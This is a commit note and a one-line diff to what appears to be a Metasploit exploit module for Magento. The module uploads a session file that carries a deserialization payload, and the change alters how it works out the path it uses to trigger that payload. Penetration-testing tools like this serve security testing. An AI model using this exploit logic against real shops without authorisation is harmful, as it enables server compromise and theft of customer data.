Fix magento_sessionreaper: use server-returned upload path when available, fallback to default path

Author: Chocapikk

modules/exploits/multi/http/magento_sessionreaper.rb

@@ -141,7 +141,7 @@ def exploit
     uploaded_path = upload_session_file(session_id, guzzle_payload, Rex::Text.rand_text_alphanumeric(8..12))
     return unless uploaded_path
 
-    save_path = "media/customer_address/#{session_save_dir}"
+    save_path = "media/customer_address#{File.dirname(uploaded_path)}"
     unless trigger_deserialization(session_id, save_path)
       fail_with(Failure::Unknown, 'Failed to trigger deserialization')
     end